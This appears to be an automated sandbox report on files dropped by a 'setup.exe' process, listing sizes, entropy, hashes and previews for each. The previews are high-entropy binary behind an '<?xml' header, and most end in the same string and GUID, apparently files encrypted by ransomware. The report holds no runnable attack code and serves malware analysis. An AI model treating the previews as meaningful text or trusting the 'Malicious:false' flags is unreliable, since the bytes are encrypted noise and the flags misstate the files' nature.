              Preview:<?xmlRjY..e..&....M*l!ZM3c,B....cgXJ...S......0a,...8.g.i?W.D..o....:9,,l...D..O.ZP.J.i.#......Ew*Hv..c..F.v(.t...O.p..s_).....%c..$.J..O..,..(.....<..h..Yi.L._.[.5....3-7G.5...u....h ..M...../....f.:.=.s....t.x......b.^...)..r.e....s.Ki..C...R...(..6a..Ss....z...._b,.F.7...Q(..&.O.N.Kz.T...dpp..>..`.......'t.fK.G........2.....a...]....T(.Zq( .?...%..S.l.H..~9~..Y.....f....`<...8.t1.C#...Z.x.W7`';$....tSSi.YyEym...K...%.)=...{h:...Q2~...-. ...8(..k.7..."..;.E...@...d..A..iCn..8.y{&......n.n..%_..3.-B_.bZ}.:e?t(...d.jj;tz.a\}.%.6k...U+D_S........x..w.QD...1....t3.......h....[.+z.N..a.h..I.i....%Z.Q.....%.N.j>z.2.|.....r]..v.p./)Kk...@t.^Do....Rs.y...S.Ia.6.%,EL.j.!..c..{9tu...P...#..U(........+.-.....`.2...ry:p_.s.R..:.H....rR.....Q..k.^;.T......,..$....v.W.VQ.9/...;h..j.mh6'vS.Z..m(dx..{^W.*.l....W...h[.Z.{.....O...)7..m..-.......[g.$\....(.....R.&"o......nM?-z...U.7sK..)Y*..!..B..-...@../..........1......+..3Wu.l.o..%$:..@e6.&vV.G...x.V........J+l#.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1731
              Entropy (8bit):7.8870928192982905
              Encrypted:false
              SSDEEP:48:xUJcJd5kOub8r6o7tR5inJFU2YGVhOJf9bLQ8LlZD:xUWD5kOub6Pt/2Jif9PQ8n
              MD5:0B0A953A691B224F98342CB25EB3C148
              SHA1:697108E4B96756C11778C303A85BEA25E189B9F6
              SHA-256:AB0B14A34EA0064038B65F11483039BA42170BD5661D0EE00EB54BFC79071368
              SHA-512:942126076FB2A00131F48F066233CBF20169E7A8C4EF38210519DE06F3A98265A1D0CD6886F98B5AEDE45D600AE32119BA56DAA4A503E7180FAC05923EF1116C
              Malicious:false
              Preview:<?xml.h=..n..B.....F..A=Bv..h.Jff.r..%.>...L.yo.X...U.|..P.Y@plN.W".(>a&^l..t6.fp...O)S.V1...5...u...".,...............i..}23..AC...i.......VOR.....?[.......\..-{..&...Y.p....."kq"grc...F:Z.N}..8.s4~.!7:.......n\...e.Q..5...$.:.D.......s[LL.Z....$.].....A%.<.lW.........e.k`F..2l.....D{..nv.X.Bb.YI.|.N..,-...#r5....Q.....<.\.......H.YT.../.....R.(.....S...|6NP.........9..C...u..6..._s...6.{.....E.]....C..z.......SI.Pg.6.G&.v...D.....Mm.j..o....v.To.......d..>y...y.+..o...pM5...G...)....&..@.4B.-..7...H..% .e.=....W......Q}..A..Pa.f.(......\..vT...g.}q..!..=2`.n..).....|B~...Tq.e.=....*~W..|....G..4.i..~.TT/x.U..O.._.$1....o...4...]..#.Tm....F.#...x..k...O..70....k.reg....I]3..^.&.....h..$2.U..n..C....~<..G.&Z.<.'..S..L.Ds..[f..._.|%.,8..)eW..X.zTn....\.r....3..5......@..;.s.OZ....6.......^..........2~X..o..K..s..~...C.Ayz...rI......>..6.'Qt(sp..z.....#&.x:eK..........[....c8.d..\4...|:..._.#.q...)Po.1...c.[.....z26G.._{.E}.....7.PcLq
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):916
              Entropy (8bit):7.784923421649568
              Encrypted:false
              SSDEEP:12:Oa8knmclHkOZWBlOdIZIuFeh23Yc7uvd5yltgNmv0z95wlY+r4gK0LzLyiIcIUCu:OaVlkOC9+23YVAtgNT/yYdgryivjbD
              MD5:1DFCE19380A1FA0BD1C77912F9C47D0B
              SHA1:0A0B2DF47CE0E4CE6685A1372303EBFF22C73D77
              SHA-256:7FFB1D88EC04B398C509B9993CC6260D75BB43B98A57E33452169A6BCB82EB27
              SHA-512:38F2C09F9079B4CC588E0FFAEA279E86203DA2A23A7DEE84DC943563EDA87A133D1E9045EADDA2925F670FE8D6347180D4039C336E173D019D3C3D73517DD2D5
              Malicious:false
              Preview:<?xml...F..h..W.O.f.R....:.0&......dd.r.i.$..].7..k......<.....x.8...L....*.6.3.....[.7:.............|7..]..t[......&y..v...k.PHC.....tf=..d..p"....xJ.T.As..X......`L8..y.YJ..p.)...............hKG..o....KY'>..-c..&.ea.p).J...........b..._.?...[r.X.......>...7.cQ.....q.9.N..+........X.....L[...2...Y..J.,jF.=....3.l9.X..~....V....7.w.>.....P.p...Za...`X.[...q{.5.....*0.M..v..........5...[.C.+6f.h.9.{C...qx..2.&/H.....{.+.bv?.../.x{.. ...I........#U..r.q........T..NC.4....1V}-....c.M*l^.S?.\...I...D.x.'H..1..V"...EC...j..b.S@........\....\#.....|...}....@+.....1.sB.c.cdF&..@...g._.3o..~Kh(..@-(...b....g.[...?...#J.....NB.U.s.ew1.H.Ki.,........XQ..*FE..?p~...==K8m.y.........3.$.. w&9#AA..]zy...........].. .vI<...L.~..p..j.WC......E+@.........i!..f..F~..#j9....R...q....36......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):887
              Entropy (8bit):7.7717599941383355
              Encrypted:false
              SSDEEP:24:1ULK/LDOWbG5BSOLxy1vlw9IV+zCl08t9bD:1JOWbABNxyd50zRQ9D
              MD5:01C643C214B3B5E43D597E1DD8C2B7C1
              SHA1:B6213CE5A2F38C34FF92179516B285BBE730B5A1
              SHA-256:8DAD1778686DB4E8AC5B42EF1DE92B253F0EA2BE4004FE011F1DA481F16EE833
              SHA-512:0A8B7434628F556273B75CAEDB22574862D8E06FD3C3D59DD521C33FE93FF41B314B835C6E9F88D3378EFB9DEBB624A2E906C08A73025A117A7ADEB21CB82DE9
              Malicious:false
              Preview:<?xml...eq!%no......P...KK.tP"F...,j2tB.8,...M.),.J.].i!........f...n.wM6<m~(].....w...Qne..i...n.. ....5...!.W......k...>....~|r8U.M.T...oD..C5Ph..!...,...(ilf.6...6R.....it3.ES.SF..r..".!.Q..Us-=t..'..]|c}m.p.I.2.hl....|...Y.........?...U*....(.ur.1.U..>..(;Uq.t...G..{b...r?."...!W....nSOu."..AO...U...:.fj..)..a>.[....G..zg.0.._....d.o}m..~.[U.Qi.Q..b.}..B.Y9..P..7$.$..f..e.p....{...i.. ..t....f.....e.].."...T..{..bFDZ..X:*....K6.. '.Q.......*&.\..!..p(.&..%)....em.{..x.T.!.)..2.(I......1.....W....;...).":\@.c......<..B..R.c.v...y3...|..!....|7...u....i...|..h>{o..g...@..\5;vI..i...T.G..Bp(l.Z......]~.2...K..O..+_.. .#z.L.V3P.!.T|{...NB......l.....3?.Q. f.~....y.....t...k.g...L..R....t..8%.p%.eK.l.xA....=...`.......9-#.O.....8../.._b........|e....}..H`VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):975
              Entropy (8bit):7.7702889634441625
              Encrypted:false
              SSDEEP:24:qdJmmQpjwT0fUG25mbTwo/Xqq+sjPvVfEDFdLkyTCbD:qawT2FcUzvyTQD
              MD5:09F8A2A964A5E58F7DB92EBB8F9AAC76
              SHA1:272FAF9600B76F2550E79471CACB1EC5BCFD7014
              SHA-256:27BF2DBC657AEC85A73A7880F6794D2D209D21BA415DDD985BBF7E1A7DA169F7
              SHA-512:1125C13158260994F68A19A45DE284BA29CF2BEE4AD6A23032F088A178C5E74DD0D9826D29254F493F0E1307EFE88CD85427FFC8EB21A68C7EB3FEF2D4F74610
              Malicious:false
              Preview:<?xml.\pt=....q...1v.~....~;Jr....9.5.3Q.....a^.-r..s..fi.u.d`S.e......Q..$J....T.....DE...U..Nx...yT..@JNf..Y..<=.h.x...1;.......M|.|...|.n.EH......sxr.m]W.A..D..1..|hW.1..>V.1B.t.... \..u..E."..=...(..)....#......lH.cf.NM....y.....@..5.?+..%.-(n..8g..K..)..3m@m....../..tv..(..<;.56a..,<Y..4.....~.C..B...s?In..w.{......y]...B...\..4.Od.dX..G............GIw.X.7.B6|.VB.L.`.`Y.Q.A.D.P'n..M.e....J..\...2....J>.S..L..?......(.....^b...|m?.........n..9.G..f..4..Vc..A;.3..4...X.....*f........|..I8Y@y.g.!.~...."..sv.x[X.......1....bs...`C..P....o..Hq.~..N... .J....F.._.F.L..,o.K..k#...nM1.IzZ....fz.iv..........JA...I.HJ$.x..T.c..n..\..i../......(..3.?O.....lS.+HC.3..!..D..;.v!....xY..v....q...W...R.. .. .*....<.[K.H.isS._`,.....s.. ...F..8.#..+.3Qf.ZV^...q.+^\.z*.WH.....T.5.V.FYT.>.m...,H.._!.fY.O..Y........1.+(.q.$`....$@..K.I....K./....O.:3.3/..[.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.720088251398296
              Encrypted:false
              SSDEEP:12:Q5/IyeaWinDeaxtQX83fohvjItg4GtiPxsm8h0hIwW57+hHzveUnAGfjjPezPU7s:IIh6nDeaxte83foZItXL8h0ywU+lzvej
              MD5:9994639D55A9E1A563726FF1EBDFFE17
              SHA1:737AF57E1568A8F40FA6CE26AC1BF37287A966B9
              SHA-256:C5274DFE3E0E3282D15D2B7BD0BE6B2752FB15D67AC2ECC9A058AD67FD660A9F
              SHA-512:9CFA7FFB672B010E408F44E4C700AC77AC1A9FE2AAB1B98D5C6BD572E7C0600B6932FD2B120DBB1A987905F93178CE324EABCF5E39D9131FEF16D351B61818D6
              Malicious:false
              Preview:<?xml.;.e).A.g...qh).\..`.>...V.....NB..o[.>..$..zR1.J!.n...~\...>am...A.nr[uK..!......!.....Q..".T..$T".:..tF..........q..S.\.#...-..`.:.-.f...X....u.f..........v....H.m@.=.t...p~.G.E.L(..q..]Kv.(..G.N.zQ..8.}N..AP%S....u)..m~o......i.q.N..`......~...........q........F...>..9.,y.`:uB.d.*..wk.....b..l.B....?f.......s?."M.v..<.3.S....F..y......+...V...N.{..t.".-p..#....!.~..@.................F/..k...&Q..........B....hm.1h.....}.....r...S~I..@..W...c..HS$i.g...8...O}.9NhR....oe.G1...cu...j.\.....#..^.a..O.....+)..vJE...[...I^8.....9..m>:Z...r~...Q.%...(.B..J.c....H@..).,z.h...d...M.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1031
              Entropy (8bit):7.785018514859854
              Encrypted:false
              SSDEEP:24:TYhcvgaxkGKKdak3C5IJDLHu4KNhGUlq0L4gbD:8hxax9X3COJnUhGUl9LHD
              MD5:9B42D6F5ADDAEFA410320D7D2DE7F08B
              SHA1:F832E042F038F2C0336AC060F544CEAD7F0DDBE1
              SHA-256:A6EB5BD9FC653763BF82AB30A5FF4FBE045FBD4460DCF16EE55BF2709F6B21AA
              SHA-512:D67A37A2BF1266459F611A54CBB598896AD8F767B2620C887B980AAD7D9C1FBF84E910FEE1033FCE49A74FA3F2AC308BA1BEE8EAF561546D29BF5D779BBA97EF
              Malicious:false
              Preview:<?xml.....i.....u.u..O.+.R..3i...r].CC.~........./8.,.2`w...^lo.q..*.$..j/...S....<Z"bp.iT..sBq...Wg.G....(..Ght>.!J8.<.....r.c|........O.....C..j7..f..-.8....8.]1K4.....l........Z\..'fo?...|..&.%AY4..5U.x>..t*Q./....,.&.2c.....+...%....'..OK....EG..;....(6JA..*..Bt.2.....E...KC.,M.=1....m..c....m.P5....;e.A;.o9..ZrGq;.ui^.G..;\C....h.{0..GEE!&......wB.8w...<.,.Z..(.#...Wu..%....?,.``&.@l1J.hl._.wk..%m... u.....%...}z..*..k.D...6.l..b2?...^.....;.`..K0.%..-.Y.Z..FWE...$....`...C...f..hG...>.&.XR.".......bt.4..1o'.........@...Y*4.2f..l.i.\.;L;<j..EM/J..\K...5.w...K$.9.C........B]M.._..I...@.~..2..zm...;..e.....eP&....(...B3*e.(/........CqH.3,I..C....f.............l..F.....c.....IG.......|F..6+....7.#...l.........%...:jE..UH...HbBe|v.dk|.]Z.bZ)........l..n..T...3A\...a<7G.. JIv?.......yu.J-.U.[.....[....... .....ME.e.l...[._Y.D}&Z....J...d|P7G............q.i=...C.:.z,......V..h..Me.t..;.h....t/.c....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1143
              Entropy (8bit):7.799615883483429
              Encrypted:false
              SSDEEP:24:ZRIJCWBpAXD6gekMHu8SWw/zjHxbMvUosS7x80vMysGTt1+b0C2bD:LIJCWBpMFB8SW8vBFKDvMco1kD
              MD5:945911BC6B7A4DD93EC07CD86B4D0F50
              SHA1:0960993ED59E1319399EBDCB04A2D157B02136AD
              SHA-256:C98AC15C2161065B3821582309A7F3336B0F95BC54DBA95DF1EF32C1F0AC0106
              SHA-512:50E8C9404BE46179FCDE20F261DF3DB1CAFC531D77406A2734F152FDC059B3A25346D850111E11B72BDDCD710AD84F5EC9C6281F5415B861C89954777ECBB4FA
              Malicious:false
              Preview:<?xml.t..Hk.Nd..1G{.$.-..rs..).....8..W..>/.$vp....3...)....`.'.....,.....t.=.l.6[M..=..]...Ny..>..l...-@.k.h.WH[..l.6.^v.qF.pM...I[.x>Orl.D...U......%.[...h.....A........?._'.....g.Qlx...-....R.-.mWY...d.$IO..A.\..:.$AHQ.2.E............k.\.R.FA..t..r...d..W.B=....S...c.gdWf..8,.....RF.<.p........Z..K.(D.+.s|..k.)...&.T...W......z..e.pP....=...F. F.fp......n../p..o.2gS...ZK....<+.........QumkJ....A!@u$...hy...<`...h?.....u]+...L1...I..Q.7).*.U.qx....R...d.J)...N.N..y..z.3.gi.&.g{V]..5J.5..&^NP....f...Xv."...U..- .6.la...Ca.....w...*h.;s..H.w...K....'.../B.a..Y..(.VS...G.m.1s3U*df.....\...H...wJ....,8qy...<?.dT6...SO.;......4..p.h..s ....<q..5.]5..:k.$&.Y..8.l3p.=v........[.d.d...g.s.]....v.T....3.|.<Z..>S.s.Z..L.bl..Kr.x...y.+..~./A.....+_Z...V.......o..C....G..R..,V..@.t..M../.x:......O..r}.MFkg..g.:vt.B.....d..N,.b.I..6I....U.J.8....}g..s...W......L:..}...3.....S2....AE.:.<.. 3r\.X..I....wf.....0.....;q.{...V.]..?..q_g#...7e2...I...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1503
              Entropy (8bit):7.85278451918109
              Encrypted:false
              SSDEEP:24:Ej+ToXEJn3LGzQ8bLOQh0D5+YCJrp3pzlkdIWtmqLbiehxIZMOcOWGEaGYbD:e+Tt3CzQo2D5+YCJrnxeIWRb9vINWnCD
              MD5:3DDD88C76D2FABED56628C867D591339
              SHA1:D9C13A301592E9C3262315719122ADD58A80B614
              SHA-256:73284CDE82C5511D9F7F9DAB822078521512CA7EC96FAB33116B141CC24E86B8
              SHA-512:44919658BD380937334EECF9DB8408EC0F8ED1EBD3123DC3A1149B1CE62F826447D4048221DD0D5FFA7C6F002276628E3E2CF4B54818E01F5223899711DAEA91
              Malicious:false
              Preview:<?xmlak...K..T.i..........j../|Q|.-.}.G8Zhq&..t.Yf......eK......r.i...i9.1...>tC.p..%..\..aF.?l(.<T+...[:..<...|........B.D..C.p.].>...e.r\.......... e.*'(......&.......53......i...+.."R.._.....'...vk.....[.](u.........:F...|d..<.]n.X.R.L.......K..B.. Z....aV.!.{l..UxMI....(Z?|-..D"N....t...M.Y..n9+..i...n.....y...,li.^,....Q..}.g.D.^.S4.f...9....t%.wN.(...0K.m...wj;....[.j.f..wu.O.l.~.2..l..3..].H...5.....I.;ik..@.J.7.H.t/`..P. .G.-A.c..|..3.B.6..I.2NMs.A....vhb:H.9p..:.W0.Z.......#...SL...^..1..&5.>`|......R...1J...q...i.i...>..YA..e...........!.....4...2gt.{.#..V.......H...%.-t5.z./.-.......n.[.[yW(0.:.Gz....3\)..l.~.Y.....kt..5n..4:..*........65........T....u.....xdu..U.F...o.8]..J....{....\...[.l%.R...16k...|I^$Z@..|...sAN...Dq.ap\.V...0..3.....:.....i.{....:..O....pT..7..|.D...h.=..+].SaY.F.....w0(4h.z.bDt7..C}.....Xl,rx.I..0..r.....!.*i.-2.(7.7#.R.......Hxb.......W.M...t.-..B6.'(....GbY...2.X....!.b...".a.st.EA..L.......(.L.....E
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1036
              Entropy (8bit):7.786152287779629
              Encrypted:false
              SSDEEP:24:hpCC8G5GZwd+sSYSr47NX6HoZC1u+MLAeVUaZ7tGbD:375nMBr47sHKC1XMLSaZ+D
              MD5:23A2125A020C3D36D9C1ADB79A9693C5
              SHA1:2956509C19F156753B014612B16074C1C1881398
              SHA-256:8C94B23BB3E09B3EB1C5AA8CDB79450D6AEEA8A5F9A9586D04FBB77494A981C8
              SHA-512:DD15FC7ED575C8C759F4725BE82C2A898DFE1B5FDA3060BF2324B546CBF627E941ECAA40B3160021C71C99C2F95FFE99AC001891F76CB72E22B304944B5C7275
              Malicious:false
              Preview:<?xml.U.Z4...2u.s..., .D.?....T@.6......P.r.......V.<.....63g...6.$..Z...<......H;..Zmx.S..T..@.C...DB.2o].#_.....oDb....p.....~.B.....Bzk..P6.Lk.......>.!..!.......L...i.....i.4.T..o.@9...a...x.ql]....@..$..D=3&tm.....i....].0kA'......v.;*....,.a......I.0....YO.8K.... .1.{.........6..E.0....Kb...V....Y.{`.j++<v.t......f.w..1B._G..3e../(..X..".}..]....$..J..HU...1ekj9P...Q......F..|.8..Z..T...2...m.s6l...{.{...>....[..}Sw...4iM(..a..v..^x..k..<~..X{3,f6...Z{.....O..0..[.^Y....A...S..........[..O....S0.".&..:f..bV:.e.?*.@.Jkx...:...........d^.m..1.Wx03.LzZ.U.....7"......jh..;_.....{.7..yv...\..g.T.........9.Qg.....4Xb..*J._i...Oz.@"...cwR...u.b..g....9+.-.a!~T#-@Nht..;{3......$...8...,.v....73 ....M..1.EF.v.;.D.......m.v-G...Q.8.jq.....P..#V..Zh.._..D.....Vn..\ ....s.. .,.Y...T._../....O..fM.+s...?..c.}.!.._*..'o.4>........TyZ=,..-.T....|VDP..y.,.}....5.b.mbj.WU.R5..%u..%..VX......6.R...*XQ....J.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{3
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):7.776215856330632
              Encrypted:false
              SSDEEP:24:13MzschdJgZzr/HRiy2On+xyOXaMuXbaPQUGqdbD:qgjZzDxiy260XpheqdD
              MD5:2D0BF17778F14D6C33482710ADFE8F7F
              SHA1:8C04E55A8027179FD0C53B2119F826B02FB4AEDF
              SHA-256:C8184C3D301D199D8855A64BA30EBE88D25BC3C116FCD7EEF6A49A8DE4830DA0
              SHA-512:0B2197B08A15E5302B78290EAC3F162E11B9F54C433EC34AE6E9A0B137C261A4A4E0D13A7098FE9526935D71CE7BA569C50AA12CFF7DABE933FC687E7622D0DD
              Malicious:false
              Preview:<?xml[GfdT...l.]....m:..x..lR..}IL..fH..x[u...%...9..8..Ac.b:oOo.'....U....-6.W......m...`]/...w.aK...l.@A.I.K. 'w..>.U...N....~O..|.QWy..0...Fr..w..Bg..}c/..,4)o2X.YR.x.o.#.......TMO2\..:|c.....[...X.%}...+.e...f.a..?.....5.<.Pj..}...~...V6.i.~.#.|..P..rX......i...g<.......,}.3.R.....h.;....).}f."./j..E....mh.k.1......R.!....t.....s9.w......o}.....~ge0..Ox1..v"g.5]=Fsz...'..b.>...;M.R....N.i...3k?.'s.c<.P....L....y..A5....k.O.~.G.....L.)}...9-.y.........j,H.P\\^...^...1:.x.s...........uG.W3P..1..0.<.\,.f......l..:...`..<M.]..8.;..X[...O.`.Y......t.._.a.<?.!6]..\.........(l..RS..v..19......#\C.m.=..."..uv..*.~......Z.e..."i... .....c..'QI...j9.*....!ot].:..#......n.a..8..`.._..1. .....'.......q........."..f.......D....v....4..N~H..KXo....s.....!....m..'[...".F....2M...l..._./.t.t...4..h.F.....C~.q.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):723
              Entropy (8bit):7.689912311833204
              Encrypted:false
              SSDEEP:12:q4SCEOKXrzH08nDT2bMOWdFt8eme9paj8G0mP4ygQ2U81B8Nzq/ybyoZeLnWQv5u:D6rzHFnY4HJ9988YP/yU81Izq+lZeLn4
              MD5:677167AEB8DBDACFCD6D5867E79F461F
              SHA1:F81C08EBB3DD78BD9290DBC5E141A622D49A97FA
              SHA-256:A14C56E89E75DFAD024710EA8625699A4FC8FF2CF9038F560632294E73761869
              SHA-512:1FFB6E38237F849AC14ECED916F4D4D8E4A5D5F460D412C70C52E1F1DE6B67DDD3673A3DF7D457F06C4E6AE9B6FACC7A5EC29A480C6EC91D4A9F6DCFF956ABB6
              Malicious:false
              Preview:<?xml."C:......<U.v.=.'....W<.......Y..}..n..A.v.A%..-.L...&5H.c...<Y....T.UN...#?....r.)i..w..a.oq...:Sz.|]+F.J...h.........,...n7M.....0.[.........Y.........mL1$7......)..#.q..#z_/..L....^.!..5/..H...w...vl.w.v.L.4.....2.^JvR..._.f..........q-.G.......M..8.3...5..YN}....i.........~.7\. ..vD.x[....ZdE....]%.F8.@-VN..]..*.`c..".p.K.$A.McB.yL.....-*.y.e...j..._.z.N..!\Y.P.K..}..d..Cd.u.>...Tf[I.D.K...~6TAcjo..S]..4....J.....;.......|j}...+.+2.Fk!.+P...A...vU.|..(y6M...W.....)=.e...~...sK......Z...S.....M....'7..dr.0...C.......8....o1 ..w..k].. J...'...5....d.x..R. _..(..cH.<.....X1..x.].wO..!.^.I..;S...f1.z.i%. \.)_BVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1089
              Entropy (8bit):7.809425472598282
              Encrypted:false
              SSDEEP:24:705amICQlHqCgeq8H2MZq80oXJhdabs5huqUjb2DezOoZbD:Y5azCKKCoYPZtJhkbCtCqDhQD
              MD5:27E82714E90660FBB25254AC9F511821
              SHA1:544D9A26F4558FF3A0BE0E023749231E1320D084
              SHA-256:DEC0146253F50C54CA3CCA9C7870C6F0029FAE5AEE22FE7F5525AC4D95F5FAD6
              SHA-512:1F8E9E92CF1C7143BB1ACC61EA04E4ECC4E97B974EE4B1FC070E153AA901894FFEE907BC4B106299FDC3B0CAE88BD9910E7C8B060EBCF23487E67A592088D6E4
              Malicious:false
              Preview:<?xmlJV...)...?....O..?...W.F'.f.....1!%)...?v.m...|..0. j.b.-..uU.*.^*../.l.y.M.1..m...^.f...m|{Q....f.....i.a...wD.....#..}.g.|y......R..|...X....>>|.:..y..G..'.m.?....X..7.P..+...]C.5t.F......L...y.d0.!..I..........R.XB.B.~..7.gw+gHf?s*.94$-.K(.:.E..n...v.......%..5Uz'..!+f.~W.Q..."[......[.`..U.O.R.n...+t......)..t.u.....B..._.....\.a.Dj.K...?y.......|....S+.5.@C.IO.......jU..d.e@Z.O.E...l..j.-.`).D.....k..J.>..RN.\...TM...i.<R1u$.P../:.X}.d........F...7l.L...&...e....*.2:..k... ........8n?.d~`...-...U.+.....l..a.f.......I.U..RPO....F.`.xA....Z.Q.6.+.^.E..b..T...9.+.VZ1..EU...)... z.wd.......d.y..f.[D.y.x.1.m)..yqF...sY.6......e.u=..<..T1.Jv..RA...k.!c.9..O..........3.uDZ..<..DH..._.F...;....{.Pv.>.I|a..7B..5...G7.4.p(.V....g...~..^...}.d'....Rj.>k..l...;.......|....$...4q..).Jw..[*g.5o4.3...T.e......Z.f.mB.U....{.~...#..f.M.S.|.5.....rA....2$..l...b5g....Pg,....S.... ...}DK...u....%..]....k..-..i..l0....gXO.".r,.......n..0..V@
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1049
              Entropy (8bit):7.809388661646441
              Encrypted:false
              SSDEEP:24:9FMzXTVfItEEu5TG8PElRN2PKY5zfj21eyq4ljSMQiRx/hzWZH3mXbD:9FKX5f7J5TFPElRN3YtchpleMVgH3SD
              MD5:31F99A1688CEDBBC27502866F6B766FA
              SHA1:11974AD6551BC360E47D5DD43D2C5323441FFEC3
              SHA-256:C402ED2CA65D596D0640332FAA0AD4F551229BD00567ABA69F66A7F9956233A0
              SHA-512:BDDE5CEF47F9AA54CE298DE6182D74CCAF134F8D5172260D8BF1E8345673112EB7AE17D4E48AA1F880CC1A2AB351738FDE9E6593DA323E64FE5C4C9A4F065F31
              Malicious:false
              Preview:<?xml........."v..kK.(..>l=C.@..Pjd.c.=.rjiX~W.1])3.....t.....ey..... Z.<.o.uk...2c....69t..`w.:M.U~uR.~/........5x.../.?....x.!t..\W...1...@.....?a....t..(..c...&....xld........h@...r..Y.g.......-0:.gp..{.G.k...l......M......5..A.....\..D=.|....[......R^.#...............Y@...W.V...RL.]..39..%.......R.t.uc........@o.z...]...[.X.>...7....0.x'mn!..b.:..K..G...7B.....(....._l.f(.+...j. "{*....d.^....l..........>...x...r.,xv$.)....!.8Y....z..&.=..;...a.$Q..Ef1...ax.%V .k.8......J:..v.ya.cr...3^....0x......?Cg{G.$....R..d6=.<1Z....D?..........d...2..]x...)Pe.._.J../..7$k.;.v-..d...;.CYY.E..x..c....1.b.T..h.2..9"R#i.:y...H.@C...yU.H....E4..GO...;.DzqCA..R.p.....AW.3.....-I...;&.....$C.-/o...E.KB.Wn.5...3.k..........L..x...{.b.... .&f!...{5...:nB.n.r....)...\el.\,{.......>..h.9.v.uS.v2...........P...a"#.M!..."^...U.p... .,n./......R...?...[.....#......s.\Hp..]U...#.J.L..Q.h,.......M...*.M\B.\.A.......P....Zo......G.V\y...<_.VrBq0iLIRHjQLgVRLsN1WK8yFkTCR
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.752781739934235
              Encrypted:false
              SSDEEP:12:EDTvLk1WF7vAEGadrpp0OrbmT7wr4ugI7fwaaxRL4cecX3YUsMR2cii9a:OWe7vSsp0qq7wcZ9RxR4f2ObD
              MD5:42B8CADC37E61BAE62705F3FDE605E99
              SHA1:52E02215126E555A2DBB616255227334D71E3F6D
              SHA-256:32A40F5AF5E137CC4119EE5CECC02AB76BC3BB53F6569E24B5821E0A9B1D8AA2
              SHA-512:517E69077C1E9324A1DEF9EB6C5D662E69A64B6093FB4B458274439E1C91C0C5CDACE58D4BFDF402C31625C8DE30D1C81CC6941EF75BC4AEE239ED94F3F94C4D
              Malicious:false
              Preview:<?xml.(..n../..f.)....'......vK%|....#.....e...q..............g..h...'[..;..`.......p...3.....X...'.&..:........}..'[.q.h..A.........<x..$...7vk.Mz.%f...X).C.0.....F[...P.e.42..}....C..X...........1RX..z}.P).0.BcK=......x.eQ.:.I.`{*z.d.-.A..T.~..$./........rt....,q...t=vz....K.5{...dI[..Fc._?^v..P........T..=_/...#.\...S.f...Q..%.=5U.,v.`/... [.I....`y..nwh?P..<..P..N...?....Q/.f.........@ . ..<Z.zv....o...w(......9.d..!.=mQ(.....Y.,.s...g...f-...`...#~.....j.JH..S.J&"..j..8s.p...[.5G..fM.N..w *.....!b........k.V.".t.M.;R\.2.....,v._.!.:Z1m.[.srjX...f+.N.Lcr.....X....\.VP...6...*N7......bjV..../l`..=.A[.8g...JT;6.g.....13>".....^.VY.8.v.<.Zp.h6f....*...:iY...T3+.....vje<l1...y3k....A.ckG.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):853
              Entropy (8bit):7.762003585329715
              Encrypted:false
              SSDEEP:12:tEHf5Hq599teFpGxa5upMtcwRF1J0+5WjoZOy/Q1YuqhWYNNJsMR2cii9a:tGI9y40uUdRF1b7rSjqhW0WbD
              MD5:1DE8F03E8A5F439BFE917798590ACF82
              SHA1:B7AA8C11EBC9E1D2020F332723A4010F9FB5958E
              SHA-256:0B08C49D8552B6BE4A791DC4947685C623AA61BB20B3F210E692C7E3F195DB4A
              SHA-512:99CD96C0537017AAC3C14C5F680B48227AEF8DDE01D0AEB5E66CC17298456C103DC201827A5FC4A572C34611CBA4E91A2475A069B9EB4DBFE9711DA2E3781498
              Malicious:false
